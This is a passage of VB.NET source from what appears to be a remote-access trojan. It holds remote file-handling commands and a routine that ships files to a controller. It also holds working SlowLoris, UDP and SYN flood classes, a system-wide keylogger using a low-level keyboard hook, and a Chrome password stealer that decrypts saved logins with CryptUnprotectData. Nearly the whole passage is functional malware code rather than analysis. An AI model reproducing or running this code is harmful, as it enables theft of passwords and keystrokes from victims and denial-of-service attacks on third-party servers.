1422. End Try
1423. End Sub
1424. Sub movedirectory(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1425. Try
1426. My.Computer.FileSystem.MoveDirectory(oldpath, newpath & name, True)
1427. Catch
1428. End Try
1429. End Sub
1430. Sub copydirectory(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1431. Try
1432. My.Computer.FileSystem.CopyDirectory(oldpath, newpath & name, True)
1433. Catch
1434. End Try
1435. End Sub
1436. Sub CreateNewFile(ByVal txt As String)
1437. Try
1438. txt = txt.Replace("mkfile", "")
1439. Dim path As String = txt.Split("|")(0)
1440. Dim content As String = txt.Split("|")(1)
1441. IO.File.WriteAllText(path, content)
1442. Catch
1443. End Try
1444. End Sub
1445. Sub deletefile(ByVal path As String)
1446. Try
1447. My.Computer.FileSystem.DeleteFile(path, FileIO.UIOption.OnlyErrorDialogs, FileIO.RecycleOption.DeletePermanently)
1448. Catch
1449. End Try
1450. End Sub
1451. Sub renamefile(ByVal path As String, ByVal newname As String)
1452. Try
1453. My.Computer.FileSystem.RenameFile(path, newname)
1454. Catch
1455. End Try
1456. End Sub
1457. Sub movefile(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1458. Try
1459. My.Computer.FileSystem.MoveFile(oldpath, newpath & name, True)
1460. Catch
1461. End Try
1462. End Sub
1463. Sub copyfile(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1464. Try
1465. My.Computer.FileSystem.CopyFile(oldpath, newpath & name, True)
1466. Catch
1467. End Try
1468. End Sub
1469. Sub sharefile(ByVal filepath As String)
1470. Dim file As String = Convert.ToBase64String(IO.File.ReadAllBytes(filepath))
1471. Send(AES_Encrypt("IncomingFile" & file, enckey))
1472. End Sub
1473. #End Region
1474. End Class
1475. Public Class SlowLoris
1476. Public Shared TList As New System.Collections.Generic.List(Of Thread)()
1477. Public Target As String = ""
1478. Public AOThreads As Integer = 50
1479. Public AOSockets As Integer = 70
1480. Dim IsFlooding As Boolean = True
1481. Dim WithEvents tmrGenerateRandomData As New System.Windows.Forms.Timer
1482. Dim labeldatasent As String
1483. Sub Start()
1484. Try
1485. tmrGenerateRandomData.Start()
1486. IsFlooding = True
1487. For i As Integer = 0 To AOSockets - 1
1488. TList.Add((New Thread(New ThreadStart(AddressOf InitFlood))))
1489. TList(TList.Count - 1).Start()
1490. Next
1491. Catch
1492. End Try
1493. End Sub
1494. Public Function GenerateChar(ByVal intLength As Integer, Optional ByVal strAllowedCharacters As String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") As String
1495. Randomize()
1496. Dim chrChars() As Char = strAllowedCharacters.ToCharArray
1497. Dim strReturn As New StringBuilder
1498. Dim grtRandom As New Random
1499. Do Until Len(strReturn.ToString) = intLength
1500. Dim x As Integer = Rnd() * (chrChars.Length - 1)
1501. strReturn.Append(chrChars(CInt(x)))
1502. Loop
1503. Return strReturn.ToString
1504. End Function
1505. Private Sub InitFlood()
1506. Dim Shocks As Socket() = New Socket(AOThreads - 1) {}
1507. Dim uri As New Uri(Target)
1508. For i As Integer = 0 To AOThreads - 1
1509. If Not IsFlooding Then
1510. GoTo ENDLOOP
1511. End If
1512. Shocks(i) = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
1513. Next
1514. While True
1515. If Not IsFlooding Then
1516. GoTo ENDLOOP
1517. End If
1518. For i As Integer = 0 To AOThreads - 1
1519. If Not IsFlooding Then
1520. GoTo ENDLOOP
1521. End If
1522. If Not Shocks(i).Connected Then
1523. RETRY_CONNECT:
1524. If Not IsFlooding Then
1525. GoTo ENDLOOP
1526. End If
1527. Try
1528. Shocks(i) = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
1529. Shocks(i).Connect(Dns.GetHostAddresses(uri.Host)(0), 80)
1530. Shocks(i).Send(System.Text.Encoding.ASCII.GetBytes("GET " & uri.PathAndQuery & _
1531. " HTTP/1.1" & vbCr & vbLf & "Host: " & uri.Host & vbCr & vbLf & "User-Agent: " & _
1532. labeldatasent & " (config: per_thread=" & AOThreads & "; aotv2=" & AOSockets & ";)" & vbCr & vbLf), SocketFlags.None)
1533. Catch generatedExceptionName As Exception
1534. If Not IsFlooding Then
1535. GoTo ENDLOOP
1536. End If
1537. Thread.Sleep(1000)
1538. GoTo RETRY_CONNECT
1539. End Try
1540. End If
1541. If Not IsFlooding Then
1542. GoTo ENDLOOP
1543. End If
1544. Next
1545. If Not IsFlooding Then
1546. GoTo ENDLOOP
1547. End If
1548. [LOOP]:
1549. If Not IsFlooding Then
1550. GoTo ENDLOOP
1551. End If
1552. Try
1553. For i As Integer = 0 To AOThreads - 1
1554. If Not IsFlooding Then
1555. GoTo ENDLOOP
1556. End If
1557.  
1558. Shocks(i).Send(System.Text.Encoding.ASCII.GetBytes("X-" & Randomnum(10) & ": 1" & vbCr & vbLf), SocketFlags.None)
1559. Next
1560. Catch ex As Exception
1561. End Try
1562. Thread.Sleep(4000)
1563. If Not IsFlooding Then
1564. GoTo ENDLOOP
1565. End If
1566. GoTo [LOOP]
1567. End While
1568. ENDLOOP:
1569. For i As Integer = 0 To AOThreads - 1
1570. If Shocks(i).Connected Then
1571. Shocks(i).Disconnect(False)
1572. End If
1573. Shocks(i) = Nothing
1574. Next
1575. End Sub
1576. Private r As New Random(Environment.TickCount)
1577. Public Function Randomnum(ByVal length As Integer) As String
1578. Dim outstr As String = ""
1579. For i As Integer = 0 To length - 1
1580. outstr += r.[Next](9)
1581. Next
1582. Return outstr
1583. End Function
1584. Private Sub tmrGenerateRandomData_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles tmrGenerateRandomData.Tick
1585. labeldatasent = GenerateChar(16)
1586. End Sub
1587. Sub StopFlood()
1588. tmrGenerateRandomData.Stop()
1589. IsFlooding = False
1590. TList.Clear()
1591. For Each t As Thread In TList
1592. If t.ThreadState <> ThreadState.Stopped Then
1593. Return
1594. End If
1595. Next
1596. End Sub
1597. End Class
1598. Public Class Keylogger
1599. Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" (ByVal Hook As Integer, ByVal KeyDelegate As KDel, ByVal HMod As Integer, ByVal ThreadId As Integer) As Integer
1600. Private Declare Function CallNextHookEx Lib "user32" (ByVal Hook As Integer, ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1601. Private Declare Function UnhookWindowsHookEx Lib "user32" Alias "UnhookWindowsHookEx" (ByVal Hook As Integer) As Integer
1602. Private Delegate Function KDel(ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1603. Public Shared Event Down(ByVal Key As String)
1604. Public Shared Event Up(ByVal Key As String)
1605. Private Shared Key As Integer
1606. Private Shared KHD As KDel
1607. Private Structure KeyStructure : Public Code As Integer : Public ScanCode As Integer : Public Flags As Integer : Public Time As Integer : Public ExtraInfo As Integer : End Structure
1608. Public Sub CreateHook()
1609. KHD = New KDel(AddressOf Proc)
1610. Key = SetWindowsHookEx(13, KHD, System.Runtime.InteropServices.Marshal.GetHINSTANCE(System.Reflection.Assembly.GetExecutingAssembly.GetModules()(0)).ToInt32, 0)
1611. End Sub
1612.  
1613. Private Function Proc(ByVal Code As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1614. If (Code = 0) Then
1615. Select Case wParam
1616. Case &H100, &H104 : RaiseEvent Down(Feed(CType(lParam.Code, Keys)))
1617. Case &H101, &H105 : RaiseEvent Up(Feed(CType(lParam.Code, Keys)))
1618. End Select
1619. End If
1620. Return CallNextHookEx(Key, Code, wParam, lParam)
1621. End Function
1622. Public Sub DiposeHook()
1623. UnhookWindowsHookEx(Key)
1624. MyBase.Finalize()
1625. End Sub
1626. Private Function Feed(ByVal e As Keys) As String
1627. Select Case e
1628. Case 65 To 90
1629. If Control.IsKeyLocked(Keys.CapsLock) Or (Control.ModifierKeys And Keys.Shift) <> 0 Then
1630. Return e.ToString
1631. Else
1632. Return e.ToString.ToLower
1633. End If
1634. Case 48 To 57
1635. If (Control.ModifierKeys And Keys.Shift) <> 0 Then
1636. Select Case e.ToString
1637. Case "D1" : Return "!"
1638. Case "D2" : Return "@"
1639. Case "D3" : Return "#"
1640. Case "D4" : Return "$"
1641. Case "D5" : Return "%"
1642. Case "D6" : Return "^"
1643. Case "D7" : Return "&"
1644. Case "D8" : Return "*"
1645. Case "D9" : Return "("
1646. Case "D0" : Return ")"
1647. End Select
1648. Else
1649. Return e.ToString.Replace("D", Nothing)
1650. End If
1651. Case 96 To 105
1652. Return e.ToString.Replace("NumPad", Nothing)
1653. Case 106 To 111
1654. Select Case e.ToString
1655. Case "Divide" : Return "/"
1656. Case "Multiply" : Return "*"
1657. Case "Subtract" : Return "-"
1658. Case "Add" : Return "+"
1659. Case "Decimal" : Return "."
1660. End Select
1661. Case 32
1662. Return " "
1663. Case 186 To 222
1664. If (Control.ModifierKeys And Keys.Shift) <> 0 Then
1665. Select Case e.ToString
1666. Case "OemMinus" : Return "_"
1667. Case "Oemplus" : Return "+"
1668. Case "OemOpenBrackets" : Return "{"
1669. Case "Oem6" : Return "}"
1670. Case "Oem5" : Return "|"
1671. Case "Oem1" : Return ":"
1672. Case "Oem7" : Return """"
1673. Case "Oemcomma" : Return "<"
1674. Case "OemPeriod" : Return ">"
1675. Case "OemQuestion" : Return "?"
1676. Case "Oemtilde" : Return "~"
1677. End Select
1678. Else
1679. Select Case e.ToString
1680. Case "OemMinus" : Return "-"
1681. Case "Oemplus" : Return "="
1682. Case "OemOpenBrackets" : Return "["
1683. Case "Oem6" : Return "]"
1684. Case "Oem5" : Return "\"
1685. Case "Oem1" : Return ";"
1686. Case "Oem7" : Return "'"
1687. Case "Oemcomma" : Return ","
1688. Case "OemPeriod" : Return "."
1689. Case "OemQuestion" : Return "/"
1690. Case "Oemtilde" : Return "`"
1691. End Select
1692. End If
1693. Case Keys.Return
1694. Return Environment.NewLine
1695. Case Else
1696. Return "<" + e.ToString + ">"
1697. End Select
1698. Return Nothing
1699. End Function
1700. End Class
1701. Module Main
1702. Dim text As String
1703. <DllImport("Crypt32.dll", SetLastError:=True, CharSet:=System.Runtime.InteropServices.CharSet.Auto)> _
1704. Private Function CryptUnprotectData(ByRef pDataIn As DATA_BLOB, ByVal szDataDescr As String, ByRef pOptionalEntropy As DATA_BLOB, ByVal pvReserved As IntPtr, ByRef pPromptStruct As CRYPTPROTECT_PROMPTSTRUCT, ByVal dwFlags As Integer, ByRef pDataOut As DATA_BLOB) As Boolean
1705. End Function
1706. Public Sub GetChrome()
1707. Dim datapath As String = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\Google\Chrome\User Data\Default\Login Data"
1708.  
1709. Try
1710. Dim SQLDatabase As Object = New SQLiteHandler(datapath)
1711. SQLDatabase.ReadTable("logins")
1712.  
1713. If File.Exists(datapath) Then
1714.  
1715. Dim host As String
1716. Dim User As String
1717. Dim pass As String
1718.  
1719. For i As Integer = 0 To SQLDatabase.GetRowCount() - 1 Step 1
1720. host = SQLDatabase.GetValue(i, "origin_url")
1721. User = SQLDatabase.GetValue(i, "username_value")
1722. pass = Decrypt(System.Text.Encoding.Default.GetBytes(SQLDatabase.GetValue(i, "password_value")))
1723.  
1724. If (User <> "") And (pass <> "") Then
1725.  
1726. text += host & "|Chrome|" & User & "|" & pass & vbCrLf
1727.  
1728. End If
1729. Next
1730. End If
1731. Catch
1732. End Try
1733. End Sub
1734. Public Function lol() As String
1735. Return text
1736. End Function
1737. <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> Structure CRYPTPROTECT_PROMPTSTRUCT
1738. Public cbSize As Integer
1739. Public dwPromptFlags As CryptProtectPromptFlags
1740. Public hwndApp As IntPtr
1741. Public szPrompt As String
1742. End Structure
1743. <Flags()> Enum CryptProtectPromptFlags
1744. CRYPTPROTECT_PROMPT_ON_UNPROTECT = &H1
1745. CRYPTPROTECT_PROMPT_ON_PROTECT = &H2
1746. End Enum
1747. Function Decrypt(ByVal Datas() As Byte) As String
1748. Dim inj, Ors As New DATA_BLOB
1749. Dim Ghandle As GCHandle = GCHandle.Alloc(Datas, GCHandleType.Pinned)
1750. inj.pbData = Ghandle.AddrOfPinnedObject()
1751. inj.cbData = Datas.Length
1752. Ghandle.Free()
1753. CryptUnprotectData(inj, Nothing, Nothing, Nothing, Nothing, 0, Ors)
1754. Dim Returned() As Byte = New Byte(Ors.cbData) {}
1755. Marshal.Copy(Ors.pbData, Returned, 0, Ors.cbData)
1756. Dim TheString As String = Encoding.Default.GetString(Returned)
1757. Return TheString.Substring(0, TheString.Length - 1)
1758. End Function
1759. <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> Structure DATA_BLOB
1760. Public cbData As Integer
1761. Public pbData As IntPtr
1762. End Structure
1763. End Module
1764. Public Class SQLiteHandler
1765. Private db_bytes() As Byte
1766. Private page_size As UInt16
1767. Private encoding As UInt64
1768. Private master_table_entries() As sqlite_master_entry
1769.  
1770. Private SQLDataTypeSize() As Byte = New Byte() {0, 1, 2, 3, 4, 6, 8, 8, 0, 0}
1771. Private table_entries() As table_entry
1772. Private field_names() As String
1773.  
1774. Private Structure record_header_field
1775. Dim size As Int64
1776. Dim type As Int64
1777. End Structure
1778.  
1779. Private Structure table_entry
1780. Dim row_id As Int64
1781. Dim content() As String
1782. End Structure
1783.  
1784. Private Structure sqlite_master_entry
1785. Dim row_id As Int64
1786. Dim item_type As String
1787. Dim item_name As String
1788. Dim astable_name As String
1789. Dim root_num As Int64
1790. Dim sql_statement As String
1791. End Structure
1792.  
1793. Private Function GVL(ByVal startIndex As Integer) As Integer
1794. If startIndex > db_bytes.Length Then Return Nothing
1795.  
1796. For i As Integer = startIndex To startIndex + 8 Step 1
1797. If i > db_bytes.Length - 1 Then
1798. Return Nothing
1799. ElseIf (db_bytes(i) And &H80) <> &H80 Then
1800. Return i
1801. End If
1802. Next
1803.  
1804. Return startIndex + 8
1805. End Function
1806.  
1807. Private Function CVL(ByVal startIndex As Integer, ByVal endIndex As Integer) As Int64
1808. endIndex = endIndex + 1
1809.  
1810. Dim retus(7) As Byte
1811. Dim Length As Object = endIndex - startIndex
1812. Dim Bit64 As Boolean = False
1813.  
1814. If Length = 0 Or Length > 9 Then Return Nothing
1815. If Length = 1 Then
1816. retus(0) = (db_bytes(startIndex) And &H7F)
1817. Return BitConverter.ToInt64(retus, 0)
1818. End If
1819.  
1820. If Length = 9 Then
1821. Bit64 = True
1822. End If
1823.  
1824. Dim j As Integer = 1
1825. Dim k As Integer = 7
1826. Dim y As Integer = 0
1827.  
1828. If Bit64 Then
1829. retus(0) = db_bytes(endIndex - 1)
1830. endIndex = endIndex - 1
1831. y = 1
1832. End If
1833.  
1834. For i As Integer = (endIndex - 1) To startIndex Step -1
1835. If (i - 1) >= startIndex Then
1836. retus(y) = ((db_bytes(i) >> (j - 1)) And (&HFF >> j)) Or (db_bytes(i - 1) << k)
1837. j = j + 1
1838. y = y + 1
1839. k = k - 1
1840. Else
1841. If Not Bit64 Then retus(y) = ((db_bytes(i) >> (j - 1)) And (&HFF >> j))
1842. End If
1843. Next
1844.  
1845. Return BitConverter.ToInt64(retus, 0)
1846. End Function
1847.  
1848. Private Function IsOdd(ByVal value As Int64) As Boolean
1849. Return (value And 1) = 1
1850. End Function
1851.  
1852. Private Function ConvertToInteger(ByVal startIndex As Integer, ByVal Size As Integer) As UInt64
1853. If Size > 8 Or Size = 0 Then Return Nothing
1854.  
1855. Dim retVal As UInt64 = 0
1856.  
1857. For i As Integer = 0 To Size - 1 Step 1
1858. retVal = ((retVal << 8) Or db_bytes(startIndex + i))
1859. Next
1860.  
1861. Return retVal
1862. End Function
1863.  
1864. Private Sub ReadMasterTable(ByVal Offset As UInt64)
1865.  
1866. If db_bytes(Offset) = &HD Then
1867.  
1868. Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1869. Dim ol As Integer = 0
1870.  
1871. If Not master_table_entries Is Nothing Then
1872. ol = master_table_entries.Length
1873. ReDim Preserve master_table_entries(master_table_entries.Length + Length)
1874. Else
1875. ReDim master_table_entries(Length)
1876. End If
1877.  
1878. Dim ent_offset As UInt64
1879.  
1880. For i As Integer = 0 To Length Step 1
1881. ent_offset = ConvertToInteger(Offset + 8 + (i * 2), 2)
1882.  
1883. If Offset <> 100 Then ent_offset = ent_offset + Offset
1884.  
1885. Dim t As Object = GVL(ent_offset)
1886. Dim size As Int64 = CVL(ent_offset, t)
1887.  
1888. Dim s As Object = GVL(ent_offset + (t - ent_offset) + 1)
1889. master_table_entries(ol + i).row_id = CVL(ent_offset + (t - ent_offset) + 1, s)
1890.  
1891. ent_offset = ent_offset + (s - ent_offset) + 1
1892.  
1893. t = GVL(ent_offset)
1894. s = t
1895. Dim Rec_Header_Size As Int64 = CVL(ent_offset, t)
1896.  
1897. Dim Field_Size(4) As Int64
1898.  
1899. For j As Integer = 0 To 4 Step 1
1900. t = s + 1
1901. s = GVL(t)
1902. Field_Size(j) = CVL(t, s)
1903.  
1904. If Field_Size(j) > 9 Then
1905. If IsOdd(Field_Size(j)) Then
1906. Field_Size(j) = (Field_Size(j) - 13) / 2
1907. Else
1908. Field_Size(j) = (Field_Size(j) - 12) / 2
1909. End If
1910. Else
1911. Field_Size(j) = SQLDataTypeSize(Field_Size(j))
1912. End If
1913. Next
1914.  
1915. If encoding = 1 Then
1916. master_table_entries(ol + i).item_type = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1917. ElseIf encoding = 2 Then
1918. master_table_entries(ol + i).item_type = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1919. ElseIf encoding = 3 Then
1920. master_table_entries(ol + i).item_type = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1921. End If
1922. If encoding = 1 Then
1923. master_table_entries(ol + i).item_name = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1924. ElseIf encoding = 2 Then
1925. master_table_entries(ol + i).item_name = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1926. ElseIf encoding = 3 Then
1927. master_table_entries(ol + i).item_name = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1928. End If
1929. master_table_entries(ol + i).root_num = ConvertToInteger(ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2), Field_Size(3))
1930. If encoding = 1 Then
1931. master_table_entries(ol + i).sql_statement = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1932. ElseIf encoding = 2 Then
1933. master_table_entries(ol + i).sql_statement = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1934. ElseIf encoding = 3 Then
1935. master_table_entries(ol + i).sql_statement = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1936. End If
1937. Next
1938. ElseIf db_bytes(Offset) = &H5 Then
1939. Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1940. Dim ent_offset As UInt16
1941.  
1942. For i As Integer = 0 To Length Step 1
1943. ent_offset = ConvertToInteger(Offset + 12 + (i * 2), 2)
1944.  
1945. If Offset = 100 Then
1946. ReadMasterTable((ConvertToInteger(ent_offset, 4) - 1) * page_size)
1947. Else
1948. ReadMasterTable((ConvertToInteger(Offset + ent_offset, 4) - 1) * page_size)
1949. End If
1950.  
1951. Next
1952.  
1953. ReadMasterTable((ConvertToInteger(Offset + 8, 4) - 1) * page_size)
1954. End If
1955. End Sub
1956.  
1957. Private Function ReadTableFromOffset(ByVal Offset As UInt64) As Boolean
1958. If db_bytes(Offset) = &HD Then
1959.  
1960. Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1961. Dim ol As Integer = 0
1962.  
1963. If Not table_entries Is Nothing Then
1964. ol = table_entries.Length
1965. ReDim Preserve table_entries(table_entries.Length + Length)
1966. Else
1967. ReDim table_entries(Length)
1968. End If
1969.  
1970. Dim ent_offset As UInt64
1971.  
1972. For i As Integer = 0 To Length Step 1
1973. ent_offset = ConvertToInteger(Offset + 8 + (i * 2), 2)
1974.  
1975. If Offset <> 100 Then ent_offset = ent_offset + Offset
1976.  
1977. Dim t As Object = GVL(ent_offset)
1978. Dim size As Int64 = CVL(ent_offset, t)
1979.  
1980. Dim s As Object = GVL(ent_offset + (t - ent_offset) + 1)
1981. table_entries(ol + i).row_id = CVL(ent_offset + (t - ent_offset) + 1, s)
1982.  
1983. ent_offset = ent_offset + (s - ent_offset) + 1
1984.  
1985. t = GVL(ent_offset)
1986. s = t
1987. Dim Rec_Header_Size As Int64 = CVL(ent_offset, t)
1988.  
1989. Dim Field_Size() As record_header_field = Nothing
1990. Dim size_read As Int64 = (ent_offset - t) + 1
1991. Dim j As Object = 0
1992.  
1993. While size_read < Rec_Header_Size
1994. ReDim Preserve Field_Size(j)
1995.  
1996. t = s + 1
1997. s = GVL(t)
1998. Field_Size(j).type = CVL(t, s)
1999.  
2000. If Field_Size(j).type > 9 Then
2001. If IsOdd(Field_Size(j).type) Then
2002. Field_Size(j).size = (Field_Size(j).type - 13) / 2
2003. Else
2004. Field_Size(j).size = (Field_Size(j).type - 12) / 2
2005. End If
2006. Else
2007. Field_Size(j).size = SQLDataTypeSize(Field_Size(j).type)
2008. End If
2009.  
2010. size_read = size_read + (s - t) + 1
2011. j = j + 1
2012. End While
2013.  
2014. ReDim table_entries(ol + i).content(Field_Size.Length - 1)
2015. Dim counter As Integer = 0
2016.  
2017. For k As Integer = 0 To Field_Size.Length - 1 Step 1
2018. If Field_Size(k).type > 9 Then
2019. If Not IsOdd(Field_Size(k).type) Then
2020. If encoding = 1 Then
2021. table_entries(ol + i).content(k) = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
2022. ElseIf encoding = 2 Then
2023. table_entries(ol + i).content(k) = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
2024. ElseIf encoding = 3 Then
2025. table_entries(ol + i).content(k) = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
2026. End If
2027. Else
2028. table_entries(ol + i).content(k) = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
2029. End If
2030. Else
2031. table_entries(ol + i).content(k) = CStr(ConvertToInteger(ent_offset + Rec_Header_Size + counter, Field_Size(k).size))
2032. End If
2033.  
2034. counter = counter + Field_Size(k).size
2035. Next
2036. Next
2037. ElseIf db_bytes(Offset) = &H5 Then
2038. Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
2039. Dim ent_offset As UInt16
2040.  
2041. For i As Integer = 0 To Length Step 1
2042. ent_offset = ConvertToInteger(Offset + 12 + (i * 2), 2)
2043.  
2044. ReadTableFromOffset((ConvertToInteger(Offset + ent_offset, 4) - 1) * page_size)
2045. Next
2046.  
2047. ReadTableFromOffset((ConvertToInteger(Offset + 8, 4) - 1) * page_size)
2048. End If
2049.  
2050. Return True
2051. End Function
2052.  
2053. Public Function ReadTable(ByVal TableName As String) As Boolean
2054.  
2055. Dim found As Integer = -1
2056.  
2057. For i As Integer = 0 To master_table_entries.Length Step 1
2058. If master_table_entries(i).item_name.ToLower().CompareTo(TableName.ToLower()) = 0 Then
2059. found = i
2060. Exit For
2061. End If
2062. Next
2063.  
2064. If found = -1 Then Return False
2065.  
2066. Dim fields() As Object = master_table_entries(found).sql_statement.Substring(master_table_entries(found).sql_statement.IndexOf("(") + 1).Split(",")
2067.  
2068. For i As Integer = 0 To fields.Length - 1 Step 1
2069. fields(i) = LTrim(fields(i))
2070.  
2071. Dim index As Object = fields(i).IndexOf(" ")
2072.  
2073. If index > 0 Then fields(i) = fields(i).Substring(0, index)
2074.  
2075. If fields(i).IndexOf("UNIQUE") = 0 Then
2076. Exit For
2077. Else
2078. ReDim Preserve field_names(i)
2079. field_names(i) = fields(i)
2080. End If
2081. Next
2082.  
2083. Return ReadTableFromOffset((master_table_entries(found).root_num - 1) * page_size)
2084. End Function
2085.  
2086. Public Function GetRowCount() As Integer
2087. Return table_entries.Length
2088. End Function
2089.  
2090. Public Function GetValue(ByVal row_num As Integer, ByVal field As Integer) As String
2091. If row_num >= table_entries.Length Then Return Nothing
2092. If field >= table_entries(row_num).content.Length Then Return Nothing
2093.  
2094. Return table_entries(row_num).content(field)
2095. End Function
2096.  
2097. Public Function GetValue(ByVal row_num As Integer, ByVal field As String) As String
2098. Dim found As Integer = -1
2099.  
2100. For i As Integer = 0 To field_names.Length Step 1
2101. If field_names(i).ToLower().CompareTo(field.ToLower()) = 0 Then
2102. found = i
2103. Exit For
2104. End If
2105. Next
2106.  
2107. If found = -1 Then Return Nothing
2108.  
2109. Return GetValue(row_num, found)
2110. End Function
2111.  
2112. Public Function GetTableNames() As String()
2113. Dim retVal As String() = Nothing
2114. Dim arr As Object = 0
2115.  
2116. For i As Integer = 0 To master_table_entries.Length - 1 Step 1
2117. If master_table_entries(i).item_type = "table" Then
2118. ReDim Preserve retVal(arr)
2119. retVal(arr) = master_table_entries(i).item_name
2120. arr = arr + 1
2121. End If
2122. Next
2123.  
2124. Return retVal
2125. End Function
2126.  
2127. Public Sub New(ByVal baseName As String)
2128. If File.Exists(baseName) Then
2129. FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
2130. Dim asi As String = Space(LOF(1))
2131. FileGet(1, asi)
2132. FileClose(1)
2133.  
2134. db_bytes = System.Text.Encoding.Default.GetBytes(asi)
2135.  
2136. If System.Text.Encoding.Default.GetString(db_bytes, 0, 15).CompareTo("SQLite format 3") <> 0 Then
2137. Throw New Exception("Not a valid SQLite 3 Database File")
2138. End
2139. End If
2140.  
2141. If db_bytes(52) <> 0 Then
2142. Throw New Exception("Auto-vacuum capable database is not supported")
2143. End
2144. ElseIf ConvertToInteger(44, 4) >= 4 Then
2145. Throw New Exception("No supported Schema layer file-format")
2146. End
2147. End If
2148.  
2149. page_size = ConvertToInteger(16, 2)
2150. encoding = ConvertToInteger(56, 4)
2151.  
2152. If encoding = 0 Then encoding = 1
2153.  
2154. ReadMasterTable(100)
2155. End If
2156. End Sub
2157. End Class
2158. Public Class UDPFlood
2159. Public Shared Host As String
2160. Public Shared Port As Integer
2161. Public Shared Threads As Integer
2162. Public Shared FloodRunning As Boolean
2163. Public Shared udpClient As New Sockets.UdpClient
2164. Public Shared bytCommand As Byte() = New Byte() {}
2165. Public Shared IP As IPAddress
2166. Public Shared Sub StartUDPFlood()
2167. If FloodRunning = False Then
2168. FloodRunning = True
2169. bytCommand = Encoding.ASCII.GetBytes(GetBytes)
2170. IP = IPAddress.Parse(Host)
2171. For NumberOfThreads As Integer = 0 To Threads
2172. Dim Flooding As Thread
2173. Flooding = New Thread(AddressOf Flood)
2174. Flooding.Start()
2175. Next
2176. End If
2177. End Sub
2178. Public Shared Sub Flood()
2179. Do While FloodRunning = True
2180. Try
2181. udpClient.Connect(IP, Port)
2182. udpClient.Send(bytCommand, bytCommand.Length)
2183. Catch
2184. End Try
2185. Loop
2186. Thread.CurrentThread.Abort()
2187. End Sub
2188. Shared Sub StopUDPFlood()
2189. If FloodRunning = True Then
2190. FloodRunning = False
2191. End If
2192. End Sub
2193. Shared Function GetBytes() As String
2194. Dim R As New Random
2195. Dim Bytes As String = ""
2196. Dim Letters As String = "qwertyuioplkjhgfdsazxcvbnm"
2197. Dim Capitals As String = "QWERTYUIOPLKJHGFDSAZXCVBNM"
2198. Dim Numbers As String = "0123456789"
2199. Dim Signs As String = "!£$%^&*()-_=+]}{[;:'@#~<,.>/?"
2200. For i As Integer = 0 To R.Next(300, 500)
2201. Select Case R.Next(0, 4)
2202. Case 0
2203. Bytes += Letters.ToCharArray()(R.Next((R.Next(0, 26))))
2204. Case 1
2205. Bytes += Capitals.ToCharArray()(R.Next(0, 26))
2206. Case 2
2207. Bytes += Numbers.ToCharArray()(R.Next(0, 10))
2208. Case 3
2209. Bytes += Signs.ToCharArray()(R.Next(0, 29))
2210. End Select
2211. Next
2212. Return Bytes
2213. End Function
2214. End Class
2215. Public Class SynFlood
2216. Private Shared FloodingJob As ThreadStart()
2217. Private Shared FloodingThread As Thread()
2218. Public Shared Host As String
2219. Private Shared ipEo As IPEndPoint
2220. Public Shared Port As Integer
2221. Private Shared SynClass As SendSyn()
2222. Public Shared SynSockets As Integer
2223. Public Shared Threads As Integer
2224. Public Shared IsRunning As Boolean = False
2225. Public Shared Sub StartSynFlood()
2226. IsRunning = True
2227. Try
2228. ipEo = New IPEndPoint(Dns.GetHostEntry(Host).AddressList(0), Port)
2229. Catch
2230. ipEo = New IPEndPoint(IPAddress.Parse(Host), Port)
2231. End Try
2232. FloodingThread = New Thread(Threads - 1) {}
2233. FloodingJob = New ThreadStart(Threads - 1) {}
2234. SynClass = New SendSyn(Threads - 1) {}
2235. For i As Integer = 0 To Threads - 1
2236. SynClass(i) = New SendSyn(ipEo, SynSockets)
2237. FloodingJob(i) = New ThreadStart(AddressOf SynClass(i).Send)
